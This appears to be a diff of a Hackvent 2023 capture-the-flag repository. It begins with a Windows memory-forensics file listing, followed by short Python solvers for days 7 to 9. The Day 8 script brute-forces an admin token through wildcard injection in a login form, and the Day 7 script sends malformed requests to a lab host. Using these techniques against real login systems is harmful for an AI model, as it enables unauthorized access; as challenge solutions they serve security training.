+0x918b786d3940	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.jfm	216
+0x918b786d3ad0	\Connect	216
+0x918b786d3c60	\Program Files (x86)\Mozilla Firefox	216
+0x918b786d3df0	\Windows\SystemResources\notepad.exe.mun	216
+0x918b786d42a0	\Program Files (x86)\Mozilla Firefox	216
+0x918b786d45c0	\Windows	216
+0x918b786d4c00	\gecko.4576.3988.4014201448364703608	216
+0x918b786d4d90	\gecko.4576.3988.4014201448364703608	216
+0x918b786d50b0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b786d5240	\Windows	216
+0x918b786d53d0	\Windows\System32\en-US\notepad.exe.mui	216
+0x918b786d5560	\Windows\System32\en-US\Conhost.exe.mui	216
+0x918b786d56f0	\CMApi	216
+0x918b786d5880	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b786d5a10	\Windows\System32\en-US\user32.dll.mui	216
+0x918b786d61e0	\Windows\System32\en-US\ESENT.dll.mui	216
+0x918b786d6370	\Program Files (x86)\Mozilla Firefox\freebl3.dll	216
+0x918b786d6500	\Program Files (x86)\Mozilla Firefox	216
+0x918b786d6820	\Program Files (x86)\Mozilla Firefox\softokn3.dll	216
+0x918b786d6b40	\Program Files (x86)\Mozilla Firefox\ipcclientcerts.dll	216
+0x918b786d6cd0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\permissions.sqlite	216
+0x918b786d6e60	\$Directory	216
+0x918b786d7180	\Windows\System32\MFMediaEngine.dll	216
+0x918b786d7310	\Users\santa\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.log	216
+0x918b786d74a0	\$Directory	216
+0x918b786d7630	\Endpoint	216
+0x918b786d77c0	\Program Files (x86)\Mozilla Firefox	216
+0x918b786d7950	\Endpoint	216
+0x918b786d7c70	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1	216
+0x918b786d7e00	\Windows\System32\Windows.Networking.HostName.dll	216
+0x918b786d8120	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2	216
+0x918b786d82b0	\Windows\SysWOW64\wscapi.dll	216
+0x918b786d8440	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cookies.sqlite-shm	216
+0x918b786d85d0	\CMApi	216
+0x918b786d8760	\AsyncConnectHlp	216
+0x918b786d88f0	\Windows\System32\RuntimeBroker.exe	216
+0x918b786d8a80	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b786d8c10	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\AppCoreFramework.Windows.dll	216
+0x918b786d8da0	\Windows\System32	216
+0x918b786d90c0	\Windows	216
+0x918b786d9250	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Lightbox.dll	216
+0x918b786d93e0	\Windows\System32\en-US\d2d1.dll.mui	216
+0x918b786d9890	\Windows\SysWOW64\urlmon.dll	216
+0x918b786d9a20	\Windows\SysWOW64\msmpeg2vdec.dll	216
+0x918b786d9bb0	\Windows\System32\en-US\wbiosrvc.dll.mui	216
+0x918b786d9ed0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\CacheStorage\CacheStorage.edb	216
+0x918b786da1f0	\$Directory	216
+0x918b786da380	\$Directory	216
+0x918b786da510	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.UI.Xaml.2.7_7.2208.15002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1	216
+0x918b786da6a0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\edb.log	216
+0x918b786da830	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.UI.Xaml.2.7_7.2208.15002.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b786da9c0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.UI.Xaml.2.7_7.2208.15002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2	216
+0x918b786dace0	\Program Files\WindowsApps\Microsoft.UI.Xaml.2.7_7.2208.15002.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll	216
+0x918b786dae70	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Utils.dll	216
+0x918b786db190	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\SharedServices.dll	216
+0x918b786db320	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ImageEditorLib.dll	216
+0x918b786db4b0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b786db7d0	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ImageLib.dll	216
+0x918b786db960	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.jfm	216
+0x918b786dbaf0	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\CoreLib.dll	216
+0x918b786dbc80	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.edb	216
+0x918b786dbe10	\$Directory	216
+0x918b786dc130	\CMApi	216
+0x918b786dc2c0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.edb	216
+0x918b786dc450	\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat	216
+0x918b786dc770	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b786dca90	\Windows\System32\WinMetadata\Windows.System.winmd	216
+0x918b786dcdb0	\Windows\Fonts\segoeuii.ttf	216
+0x918b786dd0d0	\CMNotify	216
+0x918b786dd260	\Windows\System32\CompPkgSup.dll	216
+0x918b786dd3f0	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db	216
+0x918b786dd580	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb	216
+0x918b786dd710	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b786dd8a0	\Windows\Registration\R000000000006.clb	216
+0x918b786ddd50	\Windows\Registration\R000000000006.clb	216
+0x918b786ddee0	\Windows\SysWOW64\wininet.dll	216
+0x918b786de200	\Input	216
+0x918b786de390	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm	216
+0x918b786de520	\Output	216
+0x918b786de840	\Windows\Registration\R000000000006.clb	216
+0x918b786decf0	\Users\santa\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.log	216
+0x918b786dee80	\Windows\System32	216
+0x918b786df4c0	\Windows\System32\Windows.Media.dll	216
+0x918b786df650	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b786df970	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b786dfc90	\$Directory	216
+0x918b786dfe20	\Users\santa\Downloads	216
+0x918b786e0140	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b786e02d0	\Windows\System32\twext.dll	216
+0x918b786e0460	\Windows\SysWOW64\mfperfhelper.dll	216
+0x918b786e0780	\Users\santa\Downloads	216
+0x918b786e0940	ঘ确醋￿ঘ确醋￿	0
+0x918b786e0dc0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData	216
+0x918b786e1400	\Windows\SysWOW64\MMDevAPI.dll	216
+0x918b786e18b0	\CMApi	216
+0x918b786e1a40	\$Directory	216
+0x918b786e1bd0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b786e1d60	\Users\santa\Documents	216
+0x918b786e1ef0	\Windows\System32\en-US\twext.dll.mui	216
+0x918b786e2080	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b786e2210	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData	216
+0x918b786e23a0	\Users\santa\Documents	216
+0x918b786e2850	\Program Files (x86)\Mozilla Firefox\browser\features\formautofill@mozilla.org.xpi	216
+0x918b786e29e0	\$Directory	216
+0x918b786e2b70	\Windows\System32\en-US\playtomenu.dll.mui	216
+0x918b786e2d00	\$Directory	216
+0x918b786e2e90	\Users\santa\Videos	216
+0x918b786e31b0	\Users\santa\Pictures	216
+0x918b786e3660	\Users\santa\Music	216
+0x918b786e37f0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\edb.log	216
+0x918b786e3980	\Users\santa\Pictures	216
+0x918b786e3e30	\Program Files\Windows Photo Viewer\PhotoViewer.dll	216
+0x918b786e4600	\Program Files (x86)\Mozilla Firefox\browser\features\pictureinpicture@mozilla.org.xpi	216
+0x918b786e4790	\Users\santa\Music	216
+0x918b786e4920	\Users\santa\Videos	216
+0x918b786e4ab0	\$Directory	216
+0x918b786e4dd0	\Users\santa\OneDrive	216
+0x918b786e50f0	\Users\santa\OneDrive	216
+0x918b786e5280	\wkssvc	216
+0x918b786e5410	\Windows\System32\en-US\ntshrui.dll.mui	216
+0x918b786e55a0	\Windows\System32\playtomenu.dll	216
+0x918b786e5730	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\key4.db	216
+0x918b786e58c0	\Windows\System32\networkexplorer.dll	216
+0x918b786e5a50	\Windows\SysWOW64\rasadhlp.dll	216
+0x918b786e5be0	\Windows\System32\WinBioDatabase\51F39552-1075-4199-B513-0C10EA185DB0.DAT	216
+0x918b786e6220	\Windows\System32\WinMetadata\Windows.System.winmd	216
+0x918b786e63b0	\Windows\SysWOW64\MP3DMOD.DLL	216
+0x918b786e66d0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage.sqlite	216
+0x918b786e6860	\Windows\Registration\R000000000006.clb	216
+0x918b786e6b80	\Windows\SysWOW64\OnDemandConnRouteHelper.dll	216
+0x918b786e6d10	\$Directory	216
+0x918b786e6ea0	\Windows\SysWOW64\mfplat.dll	216
+0x918b786e7990	\Windows\SysWOW64\MSAudDecMFT.dll	216
+0x918b786e7b20	\Windows\SysWOW64\xmllite.dll	216
+0x918b786e7e40	\Windows\SysWOW64\RTWorkQ.dll	216
+0x918b786e82f0	\LOCAL\cubeb-pipe-4576-0	216
+0x918b786e8930	\Windows\System32\d3d9.dll	216
+0x918b786e8de0	\gecko-crash-server-pipe.4576	216
+0x918b786e9100	\$Directory	216
+0x918b786e9290	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b786e95b0	\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx	216
+0x918b786e9740	\$Directory	216
+0x918b786e98d0	\Windows\Fonts\StaticCache.dat	216
+0x918b786e9a60	\$Directory	216
+0x918b786e9d80	\$Directory	216
+0x918b786ea230	\Windows\System32\en-US\tquery.dll.mui	216
+0x918b786ea3c0	\Windows\System32\en-US\cmd.exe.mui	216
+0x918b786ea550	\Windows	216
+0x918b786ea6e0	\Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi	216
+0x918b786ea870	\$Directory	216
+0x918b786eaa00	\Windows\System32\cmd.exe	216
+0x918b786eab90	\Windows\SysWOW64\mf.dll	216
+0x918b786ead20	\$Directory	216
+0x918b786eb360	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm	216
+0x918b786eb4f0	\$Directory	216
+0x918b786eb680	\$Directory	216
+0x918b786eb810	\Windows\System32\CompatTelRunner.exe	216
+0x918b786eb9a0	\$Directory	216
+0x918b786ebb30	\Program Files (x86)\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi	216
+0x918b786ebe50	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b786ec170	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\Microsoft\CryptnetUrlCache\MetaData	216
+0x918b786ec490	\Windows\SysWOW64\d3d11.dll	216
+0x918b786ec620	\gecko.4576.3988.8426202675842789959	216
+0x918b786ec7b0	\Windows\SysWOW64\msdmo.dll	216
+0x918b786ec940	\$Directory	216
+0x918b786ecad0	\Windows\System32\SettingsHandlers_nt.dll	216
+0x918b786ecc60	\gecko.4576.3988.8426202675842789959	216
+0x918b786ecdf0	\ProgramData\Microsoft\Windows\OneSettings\CTAC.json	216
+0x918b786ed110	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\CacheStorage\CacheStorage.edb	216
+0x918b786ed430	\Windows\SysWOW64\winhttp.dll	216
+0x918b786ed5c0	\Windows\System32\en-US\d2d1.dll.mui	216
+0x918b786ed750	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	216
+0x918b786ed8e0	\Windows\System32\en-US\winmm.dll.mui	216
+0x918b786eda70	\Windows\SysWOW64\dxva2.dll	216
+0x918b786edc00	\Windows\SysWOW64\evr.dll	216
+0x918b786edd90	\Windows\System32\DeviceCensus.exe	216
+0x918b786ee0b0	\Windows\System32\themeui.dll	216
+0x918b786ee3d0	\Program Files (x86)\Mozilla Firefox\nssckbi.dll	216
+0x918b786ee6f0	\Windows\System32\ErrorDetailsCore.dll	216
+0x918b786ee880	\Windows\SysWOW64\Windows.Security.Integrity.dll	216
+0x918b786eea10	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db	216
+0x918b786eeba0	\Windows\System32\MusNotification.exe	216
+0x918b786eeec0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\CacheStorage\CacheStorage.jfm	216
+0x918b786ef1e0	\Program Files (x86)\Mozilla Firefox	216
+0x918b786ef690	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb	216
+0x918b786ef820	\Windows\System32\en-US\Conhost.exe.mui	216
+0x918b786ef9b0	\Windows\SysWOW64\d2d1.dll	216
+0x918b786efe60	\Users\santa	216
+0x918b786f0180	\$Directory	216
+0x918b786f0310	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.jfm	216
+0x918b786f04a0	\Windows\System32\en-US\webservices.dll.mui	216
+0x918b786f07c0	\Windows\Prefetch\MICROSOFTEDGEUPDATE.EXE-96674210.pf	216
+0x918b786f0950	\Server	216
+0x918b786f0c70	\Reference	216
+0x918b786f1120	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.jfm	216
+0x918b786f12b0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb	216
+0x918b786f1440	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b786f15d0	\Windows\System32\en-US\wininet.dll.mui	216
+0x918b786f2250	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	216
+0x918b786f2700	\Windows\System32\conhost.exe	216
+0x918b786f2bb0	\LOCAL\cubeb-pipe-4576-0	216
+0x918b786f2d40	\CMApi	216
+0x918b786f2ed0	\Windows\System32\en-US\shell32.dll.mui	216
+0x918b786f31f0	\$ConvertToNonresident	216
+0x918b786f3380	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b786f3510	\$Directory	216
+0x918b786f36a0	\$ConvertToNonresident	216
+0x918b786f3830	\Windows	216
+0x918b786f39c0	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-1046918562-1299961717-1331875240-1001-MergedResources-1.pri	216
+0x918b786f3b50	\MsFteWds	216
+0x918b786f3e70	\Windows\Registration\R000000000006.clb	216
+0x918b786f4320	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite-wal	216
+0x918b786f4640	\gecko.4576.3988.5212297437992786329	216
+0x918b786f47d0	\gecko.4576.3988.5212297437992786329	216
+0x918b786f4960	\Windows	216
+0x918b786f4af0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite-shm	216
+0x918b786f4c80	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.log	216
+0x918b786f5130	\Connect	216
+0x918b786f52c0	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b786f5450	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite	216
+0x918b786f5770	\Input	216
+0x918b786f5a90	\Output	216
+0x918b786f5c20	\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx	216
+0x918b786f63f0	\$Directory	216
+0x918b786f68a0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\Ecs.dat	216
+0x918b786f6a30	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Microsoft.Notes.Upgrade.dll	216
+0x918b786f6d50	\Windows\System32\en-US\usosvc.dll.mui	216
+0x918b786f7200	\Windows\System32\WinMetadata\Windows.Web.winmd	216
+0x918b786f7520	\Windows	216
+0x918b786f7840	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\DiagOutputDir\log-2023-11-17-15-54-57-0.txt	216
+0x918b786f79d0	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b786f7b60	\Windows\System32\WordBreakers.dll	216
+0x918b786f7e80	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b786f8330	\Connect	216
+0x918b786f87e0	\Windows\SystemResources\imageres.dll.mun	216
+0x918b786f8e20	\Program Files (x86)\Mozilla Firefox\osclientcerts.dll	216
+0x918b786f9460	\Windows\SysWOW64\ntasn1.dll	216
+0x918b786f95f0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cookies.sqlite-wal	216
+0x918b786f9910	\Windows\System32\en-US\dnsapi.dll.mui	216
+0x918b786f9aa0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b786f9dc0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData	216
+0x918b786fa0e0	\Windows\Logs\CBS\CBS.log	216
+0x918b786fa400	\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll	216
+0x918b786fa720	\Windows\Fonts\segoeui.ttf	216
+0x918b786faa40	\Windows\SysWOW64\avrt.dll	216
+0x918b786fabd0	\MmThread	216
+0x918b786faef0	\CMApi	216
+0x918b786fb080	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cookies.sqlite	216
+0x918b786fb3a0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cookies.sqlite-shm	216
+0x918b786fb530	\Windows\Fonts\segoeui.ttf	216
+0x918b786fb6c0	\Windows\SysWOW64\ncrypt.dll	216
+0x918b786fbd00	\Windows\System32\wosc.dll	216
+0x918b786fbe90	\Windows\SysWOW64\Windows.StateRepositoryCore.dll	216
+0x918b786fcca0	\CMNotify	216
+0x918b78d25d20	\Windows\System32\drivers\bindflt.sys	216
+0x918b78d2f580	\Device\HarddiskVolume4\Windows\System32\config\COMPONENTS{fd9a35c2-49fe-11e9-aa2c-248a07783950}.TxR	216
+0x918b78d31ae0	\Windows\System32\config\COMPONENTS{fd9a35c2-49fe-11e9-aa2c-248a07783950}.TxR.blf	216
+0x918b78d365a0	\Windows\System32\config\COMPONENTS{fd9a35c2-49fe-11e9-aa2c-248a07783950}.TxR.0.regtrans-ms	216
+0x918b78d3bbe0	\Windows\System32\config\COMPONENTS{fd9a35c2-49fe-11e9-aa2c-248a07783950}.TxR.1.regtrans-ms	216
+0x918b78d3ce90	\Windows\System32\config\COMPONENTS{fd9a35c2-49fe-11e9-aa2c-248a07783950}.TxR.2.regtrans-ms	216
+0x918b78d4a350	\Windows\System32\config\DRIVERS	216
+0x918b78d4abf0	\Windows\System32\config\DRIVERS.LOG2	216
+0x918b78d4b770	\Windows\System32\config\DRIVERS{fd9a35cb-49fe-11e9-aa2c-248a07783950}.TM.blf	216
+0x918b78d4b8e0	\Windows\System32\config\DRIVERS{fd9a35cb-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms	216
+0x918b78d4ba50	\Windows\System32\config\DRIVERS.LOG1	216
+0x918b78d4bd30	\Windows\System32\config\DRIVERS{fd9a35cb-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms	216
+0x918b78d4e850	\Windows\Logs\WindowsUpdate\WindowsUpdate.20231117.155111.221.2.etl	216
+0x918b78d4f540	\Device\HarddiskVolume4\Windows\System32\config\DRIVERS{fd9a35cb-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b78d50960	\Device\HarddiskVolume4\Windows\System32\config\DRIVERS{fd9a35cb-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b79269d60	\$ConvertToNonresident	216

Day 6/memory.raw

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0d38311133ba9580a4bac36aee55f4f08a75f0462cc040907a179ad4b4351c87
+size 2147483648

Day 7/exploit.py

@@ -0,0 +1,63 @@
+#!/usr/bin/env python
+
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+import string
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+
+import socket
+from PIL import Image
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+HOST = "44c5decd-6619-4ce0-859a-882ed74f1736.rdocker.vuln.land"
+IP_ADDRESS = util.get_address()
+
+def get_image_bytes():
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.connect((HOST, 80))
+    sock.sendall(b"\n")
+
+    data = b""
+
+    while True:
+        b = sock.recv(1024)
+        if not b:
+            break
+
+        data += b
+
+    body_offset = data.index(b"\n\n")  # malformed here
+    header, body = data[:body_offset], data[body_offset+2:]
+
+    return header, body
+
+if __name__ == "__main__":
+
+    header, body = get_image_bytes()
+
+    flag = ""
+    while body:
+        offset_index = body.index(b"\r\n")
+        chunk_size = int(body[0:offset_index], 16)
+        offset = offset_index + 2
+        chunk = body[offset:offset+chunk_size]
+        body = body[offset+chunk_size+2:]
+
+        if chunk_size > 0x900:
+            flag += chr(chunk_size & 0xFF)
+    
+    print("[+] Flag:", flag)

Day 8/exploit.py

@@ -0,0 +1,85 @@
+#!/usr/bin/env python
+
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+
+import string
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+BASE_URL = "https://a26e7e66-6235-404e-8c62-051b082e0082.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
+IP_ADDRESS = util.get_address()
+
+def request(method, uri, **kwargs):
+    if not uri.startswith("/") and uri != "":
+        uri = "/" + uri
+
+    client = requests
+    if "session" in kwargs:
+        client = kwargs["session"]
+        del kwargs["session"]
+    
+    if "allow_redirects" not in kwargs:
+        kwargs["allow_redirects"] = False
+    
+    if "verify" not in kwargs:
+        kwargs["verify"] = False
+
+    if "proxies" not in kwargs:
+        kwargs["proxies"] = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
+
+    return client.request(method, BASE_URL + uri, **kwargs)
+
+def login(password):
+    while True:
+        # post payload is not URL decoded, so we can't use dictionary
+        res = request("POST", "/login", data=f"password={password}")
+        if "Successfully logged in" in res.text:
+            return True
+        elif "Invalid username or password!" in res.text:
+            return False
+
+def retrieve_flag(cookie):
+    while True:
+        res = request("GET", "/admin", cookies={"admin_token": cookie})
+        util.assert_content_type(res, "text/html")
+        if "You are not authorized to view this page." in res.text:
+            return None
+        else:
+            match = re.search(r"Your flag is: (HV23\{.*\})", res.text)
+            if match:
+                return match[1]
+        
+
+if __name__ == "__main__":
+    password = "salami"
+    flag = retrieve_flag(password)
+    while flag is None:
+        found = False
+        for x in string.printable:
+            if x in ["*", "\\"]:
+                continue
+
+            if login(password + x + "*"):
+                password += x
+                found = True
+                flag = retrieve_flag(password)
+                break
+
+        if not found:
+            break
+
+    print("[+] Flag:", flag)

Day 9/decode.py

@@ -0,0 +1,22 @@
+import os
+import re
+import datetime
+from bs4 import BeautifulSoup
+from hackingscripts.pcap_file_extract import PcapExtractor, HttpRequest, HttpResponse
+
+if __name__ == "__main__":
+
+    chars = []
+    pcap_extractor = PcapExtractor("secret_capture.pcapng")
+    for response in pcap_extractor:
+        match = re.match(r"/\?door=(\d)", response.get_file_path())
+        if match and isinstance(response, HttpResponse):
+            request = response.response_to
+            ip, port = request.socket.split(":")
+            port = int(port)
+            c = chr(port - 56700)
+            dt = datetime.datetime.strptime(response.headers["Date"], "%a, %d %b %Y %H:%M:%S %Z").timestamp()
+            chars.append((dt, c))
+    
+    flag = "".join(entry[1] for entry in sorted(chars))
+    print("[+] Flag:", flag)